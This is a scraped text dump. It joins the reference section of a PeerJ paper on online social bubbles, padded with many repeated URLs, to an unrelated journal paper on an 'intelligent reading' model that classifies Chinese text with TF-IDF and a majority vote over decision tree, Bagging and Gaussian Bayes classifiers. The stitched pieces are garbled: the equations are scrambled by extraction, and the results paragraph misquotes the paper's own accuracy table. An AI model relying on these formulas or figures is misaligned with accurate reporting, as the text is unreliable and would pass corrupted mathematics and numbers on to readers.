http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://dx.doi.org/10.7717/peerj-cs.38 McKenzie CR. 2004. Hypothesis testing and evaluation. In: Koehler DJ, Harvey N, eds. Handbook of judgment and decision making. Oxford: Blackwell, 200–219, Chapter 10. Meiss MR, Menczer F, Fortunato S, Flammini A, Vespignani A. 2008. Ranking web sites with real user traffic. In: Proceedings of the 2008 international conference on web search and data mining. New York: ACM, 65–76. Mervis J. 2014. An internet research project draws conservative ire. Science 346(6210):686–687 DOI 10.1126/science.346.6210.686. Mobasher B, Cooley R, Srivastava J. 2000. Automatic personalization based on web usage mining. Communications of the ACM 43(8):142–151 DOI 10.1145/345124.345169. Munson SA, Resnick P. 2010. Presenting diverse political opinions: How and how much. In: Proceedings of the SIGCHI conference on human factors in computing systems. New York: ACM, 1457–1466. Nickerson RS. 1998. Confirmation bias: a ubiquitous phenomenon in many guises. Review of General Psychology 2(2):175–220 DOI 10.1037/1089-2680.2.2.175. Nyhan B, Reifler J. 2010. When corrections fail: the persistence of political misperceptions. Political Behavior 32(2):303–330 DOI 10.1007/s11109-010-9112-2. Pariser E. 2011. The filter bubble: how the new personalized Web is changing what we read and how we think. London: Penguin. Ricci F, Rokach L, Shapira B, Kantor PB. 2011. Recommender systems handbook. New York: Springer. Sen A. 1973. On economic inequality. Oxford: Oxford University Press. Shannon CE. 1948. A mathematical theory of communication. The Bell System Technical Journal 27(3):379–423 DOI 10.1002/j.1538-7305.1948.tb01338.x. Silverman C. 2011. The Backfire Effect. Available at http://www.cjr.org/behind the news/the backfire effect.php?page=all (accessed 6 April 2015). Stanovich KE, West RF, Toplak ME. 2013. Myside bias, rational thinking, and intelligence. Current Directions in Psychological Science 22(4):259–264 DOI 10.1177/0963721413480174. Sunstein CR. 2002. The law of group polarization. Journal of Political Philosophy 10(2):175–195 DOI 10.1111/1467-9760.00148. Sunstein CR. 2009. Republic.com 2.0. Princeton: Princeton University Press. Nikolov et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.38 14/14 https://peerj.com/computer-science/ http://dx.doi.org/10.1126/science.346.6210.686 http://dx.doi.org/10.1145/345124.345169 http://dx.doi.org/10.1037/1089-2680.2.2.175 http://dx.doi.org/10.1007/s11109-010-9112-2 http://dx.doi.org/10.1002/j.1538-7305.1948.tb01338.x http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://dx.doi.org/10.1177/0963721413480174 http://dx.doi.org/10.1111/1467-9760.00148 http://dx.doi.org/10.7717/peerj-cs.38 Measuring online social bubbles Introduction Methods Click dataset News targets in the click dataset Diversity measure and relationship to traffic Auxiliary datasets Results Discussion Conclusion Acknowledgement References work_u66sz3ktqbbzvan2wds5ow7shq ---- Paper Title (use style: paper title) International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 106 A Study of Intelligent Reading Model Yu Jun School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, ShaanXi, China e-mail: yujun@xatu.edu.cn Kang Qinyu School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, ShaanXi, China e-mail: 534739457@qq.com Hu Zhiyi Engineering Design Institute Army Academy of PLA Beijing, 100000, China e-mail: huzhiyi016v7@163.com Li Zhonghua School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, ShaanXi, China e-mail: 761173763@qq.com Abstract—In order to solve the problem of how to find out the required information quickly from a large number of reading texts, this paper constructs an intelligent reading model. The model adopts the principle of "the minority obeys the majority". The results of the classifier trained by the three algorithms, those are decision tree, Bagging and Gauss Bayes algorithm, are filtered to build an intelligent reading model. Based on the experimental results, the objective evaluation results of the new combinatorial algorithm are attained. Keywords-Natural language processing(NLP); Decision Tree; Bagging; Gaussian Bayesian Algorithm I. INTRODUCTION In recent years, with the rapid developing of the Internet and other emerging media, human beings have entered the era of information explosion. At the same time, more and more people hope that computers can understand human language so as to help human beings to perform various daily tasks better. Natural Language Processing(NLP) [1] , as a typical example of artificial intelligence application in the practical field, is a necessary means for modern people to mine a large amount of data and information. Its main goal is to let computers learn to understand and use human natural language. Therefore, Natural Language Processing (NLP) has become a research hot spot in recent years. At present, as one of the representative products of Natural Language Processing(NLP), "smart interactive technology [2] " has gradually penetrated into many products. However, many smart products can only recognize some specific commands. For example, when the input is "Open QQ (QQ is the abbreviation of Tencent QQ, which is an Internet-based instant messaging software developed by Tencent Company)", it can start QQ. But the input is "Look at QQ" and nothing happens. In addition, people have to read a lot of texts in daily life, such as novels, tutorials, etc. Sometimes you can solve the problem by just looking for a small part of the text without having to read through the whole article. For example, we can solve our legal doubts by looking for certain passages in the legal literature and be unnecessary to read the entire legal literature. Based on this, in order to make our reading more "intelligent", we need to establish an intelligent reading model that can use natural language to communicate with machines and let machines serve us in order to minimize the learning burden. This paper builds an intelligent reading model. Since English is based on words, which are separated by spaces. However, Chinese is in the form of word, each of words in one Chinese sentence have to be connected for describing a complete meaning. For example, the English sentence "I am a student", Chinese means "I am a student". In English, the computer can easily know that "student" is a word by Spaces, However, in Chinese, "student" is made up of two words, which can only be combined to mean a word. Therefore, Chinese word segmentation is to divide the sequence of Chinese characters into meaningful words. Due to certain uncertainty in Chinese word segmentation, it is necessary to adopt many different technologies such as Jibe word segmentation [3] and TF-IDF weight algorithm [4] . In view of the simpleness of the previous model, a new combination model, namely our intelligent reading model, is constructed by combining multiple algorithms as well as adopting the principle of "the minority obeys the majority". Among them, the principle of "the minority obeys the majority" means that if a data is trained by three classifiers, the output result of classification is "0 / 0 / 1", Because there is a large number of 0 in results, so the data of the final result is 0. Finally, the validity of the model is verified by experiment and calculation. II. THE OVERALL PROCESS OF BUILDING AN INTELLIGENT READING MODEL The establishment of intelligent reading model includes five parts, these are data acquisition, data processing, feature extraction, training classifier and building model. The overall process is shown in figure 1. The details are as follows. DOI: 10.21307/ijanmc-2019-013 International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 107 Data acquisition Data processing Feature extraction Training classifier Building Model Figure 1. Overall framework 1) Data acquisition：Because there are all kinds of text on the network, and the quantity is huge, so the Python network crawler [5] is used to obtain the data. that is stored in a TXT file. 2) Data processing ： Due to the inaccuracy of the word segmentation, it is necessary to use the algorithm based on information entropy to find new words, as well as put the new words into the custom dictionary, followed that process the text by Chinese word segmentation, stop word filtering and so on. 3) Feature extraction：For the processed data in step (2), the TF-IDF algorithm is used to extract the feature value and generate the word-text matrix. 4) Training classifier ： Decision tree [6] , Bagging [7] and Gaussian Bayesian algorithms [8] are used to train the word-text matrix generated by step (3).so that three classifiers could be obtained. 5) Building Model. For the three classifiers obtained in step (4), the principle of "the minority obeys the majority" is adopted to establish the intelligent reading model. III. DESCRIPTION OF THE PROCESS OF MODELING This paper constructs an intelligent reading model. Firstly, the Python network crawler is used for data acquisition. followed that Jieba word segmentation technology and TF-IDF weight algorithm were adopted to preprocess the sample data. Finally, Extracting the feature value, training classifier, establishing model and carrying out other operations. The detailed operation is described as follows. A. Data acquisition There are a variety of texts on the web. Due to the large number of data, Python web crawlers are usually used to obtain data. But some websites have anti-crawler mechanisms. Therefore, while designing a web crawler, a simulation operation of browser accessing is necessary. Through analyzing the web page source codes, regular expressions are used to obtain the required data. The library files, such as Beautifulsoup, Requests and Re can be used to crawl data. The content of the crawl is the problems and all their corresponding answers. Finally, the acquired data is stored in a TXT format file and is added a fixed tag name, so as to be convenient for later data processing. B. Data processing By analyzing the acquired data, a lot of noise in the text information can be found. For example, word segmentation is inaccurate, as well as there are a large number of stop words. If these noises are brought into the operation of word frequency statistics, it will not only reduce the processing speed, but also greatly affect the experimental results. Therefore, the first important thing is to preprocess the data. Data preprocessing is divided into three steps, which are generating and loading of the custom dictionaries, Chinese word segmentation and stop-word filtering. It is as shown in figure 2. Input the acquired data Custom dictionary generation and loading Chinese word segmentation Stop word filtering Output keywords Figure 2. Flow of data preprocessing 1) Generation and loading of Custom Dictionary Due to the number of words included in the Jieba dictionary is limited, which leads to the inaccuracy of text segmentation. For instance, it is inaccurate segmentation of people's names and place names. So that it is necessary to require a custom dictionary to improve the accuracy of word segmentation. The information entropy algorithm is used to find new words and generate custom dictionaries. After that, the generated custom dictionaries are loaded into the codes to improve the precision of word segmentation. 2) Chinese word segmentation. After the above steps are completed, the word segmentation is beginning. This paper adopts a Chinese word segmentation module developed by Python-jieba word segmentation, which divides all data sets in Chinese. It combines rule-based and statistics-based methods [9] . The rule-based method means that, the word segmentation based on an existing dictionary which adopts manual rules such as forward maximum matching, backward maximum matching and bidirectional maximum matching. For example, for the sentence "Shanghai tap water comes from sea", forward maximum matching is used. It scans from forward to back, as well as makes the separated words exist in the dictionary and lets the words as long as possible. At last the sentence of "Shanghai / tap water / from / sea" can be obtained. This kind of method is simple and easy to implement, and the required data amount is not high. The statistics-based method is to summarize the probability distribution of words and the common collocation between words from a large number of manually labeled corpus, and supervised learning is used to train the word segmentation model. For the sentence "Shanghai tap water comes from the sea", the most basic participle method International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 108 based on statistics is to try all possible participle schemes, Because of any two words, or need to cut, or without segmentation. For all possible word segmentation schemes, the probability of each scheme is counted according to the corpus, and then the one with the greatest probability is retained. Obviously, "Shanghai / tap water / come from / sea" is more likely than "Shanghai tap / water / come from / sea ", Because "Shanghai" and "tap water" appear more frequently in tagged corpus than "Shanghai tap" and "water". The result of partial participle is shown in figure 3. Figure 3. Participle screenshot In figure 3, it can be found that there are a large number of meaningless modal particle in the results of word segmentation, which will greatly influence the final experimental results. Therefore, it is necessary to carry out the filtering of stop words. 3) Filter stop words Stop Words [10] refers to words that appear frequently in the text without practical significance. Such as modal particle, adverbs, prepositions, conjunctions, etc. In order to save storage space and improve search efficiency, these meaningless stop words must be filtered out before processing text. To find out the stop word accurately, the following indicators can be used to measure the effectiveness of words. a) Term Frequency. TF is a simple evaluation function whose value is the number of words occurring in the training set. The theoretical assumption of the TF evaluation function is that, when one word appears frequently in the text, it is generally regard as a noise word. b) Document frequency. Similar to Term Frequency (TF), the theoretical assumption is that when one word appears frequently in the text, the word is generally regard as a noise word. The experimental result is shown as Table 1. TABLE I. STOP WORD LIST(PARTIAL) category Stop Words preposition On, In, At, under, Beside, Behind, To, Over, with pronoun Everyone, everything, everywhere ... ... adverbs So, still, therefore, moreover, however As shown in table 1, using filtered stop words to generate stop-word list, as well as to load the list into codes. Followed that the result of word is matched with the words in the stop- word list. If the matching is successful, the word from the result of the segmentation will be deleted. C. Feature extraction After the preprocessing of the above steps, although the stop word is removed, the sentence still contains a large number of words, which brings difficulties to the text vectorization process. Therefore, the main purpose of feature extraction is to minimize the number of words for being processed without changing the core content of the original text, so as to reducing the dimension of vector space, simplifying calculation and improving the speed and efficiency of text processing. Commonly used methods include term frequency-inverse document frequency(TF- IDF), information gain [11] , X2 statistics, etc. Hereby TF-IDF algorithm is used to transform keyword information into weight vector in here. The steps are described as follows. 1) Calculating the word frequency, which is TF weight. textin the wordsofnumber totalThe textin the appears worda timesofnumber The TF  (1) 2) Calculating the inverse document frequency. that is IDF weight. Firstly, a corpus is required to build up for simulating the language environment. The larger the IDF, the more concentrated this feature is in the text, it means that the more able the words are to distinguish the content of the text. ) 1 word t hecont aining t ext ofNumber corpus ain t ext sofnumber T ot al log(IDF   (2) 3) Calculating the Term Frequency Inverse Document Frequency (TF - IDF) values. IDFT F IDF-T F  (3) The larger the TF-IDF value, the more important the word is. Calculating and sorting the TF-IDF value of each word in the text. The first six keywords of each question and corresponding answer in the text are found in turn, and the corresponding weight of the six keywords is returned. If there are less than 6 keywords, the residual weight is set to 0. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 109 By using the TF-IDF algorithm, the text information is vectorized and the lexical text matrix is obtained. The details are described as follows.             mn2m1m n22221 n11211 m 2 1 n21 www www www t t t d d d       Hereby, ti (i=1,2,3..., n) is the feature item in document D. as well as wij (i, j=1,2,3..., n) is the weight of the feature item. The calculation formula is described as follows. IDFTF IDF-TFW ij  (4) D. Training classifier In this paper, the lexical - text matrix is trained with three algorithms of decision tree, Bagging and Gaussian Bayes. The specific steps of each algorithm are described below. 1) decision tree Decision tree algorithm mainly includes feature selection and decision tree generation. The feature selection is based on the relationship between the information gain and the data set. According to the characteristics of the selected data set, the decision tree is generated recursively using ID3 algorithm [12] . The specific steps are described as follows. a) Calculating information entropy. In order to select the feature of good classification ability for training data, the information gain is introduced. And then, the calculation formula of information entropy is described as follows. Assume D is the training element group in the training set, its entropy can be expressed as follows.    m 1i i2i )(plogp-info(D) (5) tuples trainingofnumber Total category in this elements ofNumber p i  (6) Hereby, m represents the total number of categories, and pi represents the occurring probability of Category i which appears in the entire training tuple. Entropy is a measure of the uncertainty of random variables. The actual meaning is the average amount of information required for the class label of Tuples D. The larger the entropy is, the greater the uncertainty of the variable. If the training tuple D is divided according to the characteristic attribute A, the expected information of D is described as formula (7). (Note: The expected information of D is conditional entropy, which is based on the classification of characteristic attribute A).    v 1j j j A )info(D D D (D)info (7) Dj is the classification of feature attribute A, as well as v is the number of types of the characteristic attribute A. b) Calculating the information gain. The information gain is the difference between the two information entropy. (D)info-info(D)gain(A) A  (8) As the above formula (8) shows, gain(A) represents the amount of information obtained by classifying A as a node. The more information, the more important A is. c) ID3 algorithm is used to establish each child node in the tree. According to the characteristics of the data set selected by the information gain, the algorithm selects the feature with the maximum information gain as the judgment node and acts as the sub-node in the tree. d) Using recursive thinking, repeat above steps from (1) to (3) so as to establish the decision tree. 2) Bagging integrated decision tree Bagging is a technology of repeated sampling from data according to uniform probability distribution. The algorithm does use the different training set to fit a single member classifier in the ensemble classifier, as well as Bootstrap sampling is used by training set in the fitting process. which is a random sampling with a rewind. So bagging can improve the accuracy of unstable model, and reduce the degree of over-fitting. The final result of the algorithm is to construct a series of prediction functions, and combining them into a prediction function by voting. The process is shown in figure 4. The steps are described as follows. a) The bootstrap [13] method is used to select n training samples from the sample set, and using it as the training set T1-Tn. This process is executing for K times, and k subsets {T1, T2...TK} are selected. b) K sample subsets are trained on their own training data on all attributes. And then k classification models are obtained. c) According to the classification model obtained by the above steps, the value of each {P1, P2 …, Pk} model is predicted respectively. d) The value {P1, P2, …, Pk} of each model is combined by the average method. The final result is output. The formula of the averaging method is described as follows.   K 1 )(p K 1 P (x) i i x (9) Hereby, pi is the value of a model. K is the number of samples training. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 110 Training set （T1-Tn） Final Results T1 T2 … Tk Bootstrap sampling C1 C2 … Ck P1 P2 … Pk Classification model forecast result Figure 4. Bagging process 3) Gaussian Bayes algorithm Compared with decision tree and Bagging algorithms, the greatest advantage is that when the large scale training set is selected, the Gauss Bayes algorithm only has relatively small number of features for each item, and the training and classification of the project is only a mathematical operation for the characteristic probability. Therefore, Gaussian Bayes algorithm has a fast speed when training large amount of data. The flow of this algorithm is shown as in Figure 5. preparation stage stage of classifier training Application stage Identifying attributes Acquisition of training samples calculation P(yi) Calculated condit- ional probability calculation P (x | yi) P (yi) Judge the category preparation stage stage of classifier training Application stage Figure 5. Gaussian Bayesian algorithm flow As shown in figure 5, the entire algorithm flow can be divided into three phases. The first is Preparation stage. This stage determines the characteristic attributes according to the specific situation, and dividing each feature attribute appropriately. And then, some of the items is classified by manually so as to form a training sample set. The input of this phase is all the data to be classified, and the output is the feature attribute and the training sample. This stage is the only stage that needs to be completed manually in the whole naive Bayesian classification. The quality of the classifier will have an important impact on the whole process, as well as be affected by the feature attributes, the classification of the feature attributes and the training samples. The second is Classifier training stage. This stage is generating the classifier. Firstly, the occurrence frequency of each class is calculated in the training sample. And then the conditional probability of each category on the characteristic attribute is calculated. Finally, the results are recorded. The input is the feature attribute and the training sample, and the output is the classifier. The third is Application stage. The task at this stage is to classify the classified items by using the classifier. The input of this stage is classifier and the item to be classified, and the output is the mapping relationship between items to be classified and categories. The specific steps are described as follows. The specific steps are described as follows. a) Assume }x,...,x,{xx m21  be an item to be classified, and each xi be a characteristic attribute of x. b) Setting have a set of y categories where y1=0,y2=1. c) Calculating conditional probability )|(P ji yx .The formula of (10) is shown as follows. d) If it is existed as )}y|max{P(x)y|P(x jik  , then it will be k yx  . e) According to Bayesian theorem, the following formulas can be obtained. The formula of (11) is shown as follows. f) The class that maximizes the value of P(x|yi) P(yi) is found out, and the items to be classified fall into this category. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 111 )}y|P(x),...,y|P(x),y|P(x),y|P(x),...,y|P(x),y|{P(x)|(P 2m22211m1211ji yx (10)    m 1i jiijjmj2j1ii )y|P (x)P (y))P (yy|)...P (xy|)P (xy|P (x))P (yy|P (x (11) E. Building Model The above three algorithms is adopted to construct the three model. Followed that, the principle of "the minority is subordinate to the majority " is used to reconstruct a new model. The model is called as intelligent reading model. The principle of "the minority is subordinate to the majority" means that, if a data is trained by three model, the output result of classification is "0 / 0 / 1". Because of the number of '0' in the result is more than the number of '1', the final result of the data is 0. IV. VERIFICATION AND ANALYSIS OF THE MODEL The data from the testing set are input into the intelligent reading model, as well as the processed results analyzed. The quality of the model is measured by two technical indicators, that is, Accuracy and F-Measure value. The two-dimensional confusion matrix is shown in Table 2. The meaning of " the forecast is wrong, the actual is wrong (TN)" is that, the actual label category of the data is wrong, and it is still wrong after prediction. Based on the two-dimensional confusion matrix shown in Table 2, the formula (12) of the accuracy rate and the formula (13) of F- Measure are given as below. TABLE II. TWO-DIMENSIONAL CONFUSION MATRIX actual value positive Wrong Such as type (10) Forecast value positive The forecast is positive, The actual is positive (TP) The forecast is positive, the actual is wrong (FP) Wrong The forecast is wrong, the actual is positive (FN) The forecast is wrong, the actual is wrong (TN) FPFNTNTP TNTP Accuracy    (12) FNFPTP*2 TP*2 M easure-F   (13) As shown in formula (12), the accuracy rate refers to the proportion of successful data in all predicted data. The predicted success means "the predicted value is same as the actual value". It includes two kinds of labels such as "the forecast is positive, the actual is positive (TP)" and "the forecast is wrong, the actual is wrong (TN)". When users ask some questions, they only want the right answers. Therefore, TN label is not necessary. As shown in formula (13), The F- Measure value is a comprehensive evaluation index of accuracy rate and recall rate. Because it does not include TN label, it is often used to evaluate the classification model. Accuracy is a very objective evaluation index, but sometimes the accuracy rate does not represent the quality of the algorithm. Especially in the case of imbalance of positive and negative samples, the accuracy evaluation index has great defects. The most common F-Measure method is the weighted harmonic average of the accuracy rate and recall rate (the recall rate is the measure of the cover surface). Because the F-Measure method comprehensively considers the accuracy rate and recall rate, it effectively avoids the problem of unbalanced data distribution. Therefore, comparing with the accuracy rate, the f-measure method can better reflect the quality of the algorithm. Among them, the higher the value of F-Measure, indicating the better classification results of the corresponding algorithm. If we combine the three algorithms such as decision tree, Bagging and Gauss Bayes, the results of the combination algorithm and the single algorithm are shown in Table 3. TABLE III. COMPARISON OF PREDICTION RESULTS decision tree Bagging Gauss Bayesian Combination algorithm Accuracy 0.6569 0.7105 0.7093 0.7112 F-Measure 0.3354 0.1933 0.2504 0.3381 International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 112 Table 3 shows that the accuracy of the combination algorithm is 0.7112, while the other three separate algorithm accuracy is 0.6569, 0.6569 and 0.7105. Therefore, the combination algorithm is more accurate than the other three methods. In addition, the F-Measure value of the combined algorithm is 0.3381. The F-Measure value of the other three methods is 0.3354, 0.1933 and 0.2504. Therefore, the combination algorithm is better than the other three separate algorithms in terms of F-Measure. Whether it's accuracy or F-measure, the result of the combined algorithm is better than that of the other three separate algorithms. Therefore, the intelligent reading model is based on the combination of decision tree, Bagging and Gauss Bayesian algorithms. In order to verify the superiority of the method, we are selecting about 8000 pieces of data for experimental verification. The experimental results are shown in figure 5 and figure 6. Combination Algorithm 0.06 0.135 0.2 0.27 0.34 0.41 0.47 0.54 0.61 0.66 Decision Tree 0.055 0.13 0.19 0.26 0.33 0.4 0.47 0.53 0.6 0.65 Gauss Bayesian algorithm 0.05 0.12 0.19 0.26 0.33 0.39 0.46 0.53 0.6 0.65 150 300 450 600 750 900 1050 1200 1350 1500 0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 a c c u ra c y r a te Figure 6. Accuracy comparison diagram Combination Algorithm 0.04 0.06 0.11 